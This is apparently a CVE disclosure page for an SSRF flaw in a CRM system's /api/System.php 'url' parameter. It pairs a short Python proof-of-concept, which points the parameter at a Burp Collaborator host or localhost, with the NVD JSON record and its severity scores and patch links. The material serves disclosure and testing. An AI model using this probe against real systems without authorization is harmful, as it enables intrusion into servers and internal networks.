CVE-2026-4623

import requests def check_ssrf(target_url): """ PoC for CVE-2026-4623 SSRF Vulnerability Target: /api/System.php Parameter: url """ # Use a controlled external domain to verify the request (e.g., Burp Collaborator or interactsh) test_payload = "http://burpcollaborator.net/test" # Alternatively, test for internal access (e.g., localhost) # test_payload = "http://127.0.0.1:80" full_url = f"{target_url}/api/System.php" try: print(f"[*] Sending request to {full_url} with payload: {test_payload}") params = { "url": test_payload } response = requests.get(full_url, params=params, timeout=10) # Check if the response indicates that the request was processed # Validation usually depends on checking the external server logs for incoming connections print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text[:200]}") print("[*] Check your external server logs to see if the target initiated a connection.") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://localhost:8080" # Replace with actual target check_ssrf(target)

{"cve": {"id": "CVE-2026-4623", "sourceIdentifier": "[email protected]", "published": "2026-03-24T03:16:06.660", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in DefaultFuction Jeson-Customer-Relationship-Management-System up to 1b4679c4d06b90d31dd521c2b000bfdec5a36e00. This affects an unknown function of the file /api/System.php of the component API Module. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The identifier of the patch is f76e7123fe093b8675f88ec8f71725b0dd186310/98bd4eb07fa19d4f2c5228de6395580013c97476. It is suggested to install a patch to address this issue."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en DefaultFuction Jeson-Customer-Relationship-Management-System hasta 1b4679c4d06b90d31dd521c2b000bfdec5a36e00. Esto afecta una función desconocida del archivo /API/System.PHP del componente Módulo API. La manipulación del argumento url conduce a falsificación de petición del lado del servidor. El ataque puede ser iniciado remotamente. El exploit ha sido divulgado públicamente y puede ser utilizado. La entrega continua con lanzamientos progresivos es utilizada por este producto. Por lo tanto, no hay detalles de versión de lanzamientos afectados ni actualizados disponibles. El identificador del parche es f76e7123fe093b8675f88ec8f71725b0dd186310/98bd4eb07fa19d4f2c5228de6395580013c97476. Se sugiere instalar un parche para abordar este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/DefaultFuction/Jeson-Customer-Relationship-Management-System/", "source": "[email protected]"}, {"url": "https://github.com/DefaultFuction/Jeson-Customer-Relationship-Management-System/commit/f76e7123fe093b8675f88ec8f71725b0dd186310", "source": "[email protected]"}, {"url": "https://github.com/DefaultFuction/Jeson-Customer-Relationship-Management-System/issues/2", "source": "[email protected]"}, {"url": "https://github.com/DefaultFuction/Jeson-Customer-Relat ... (truncated)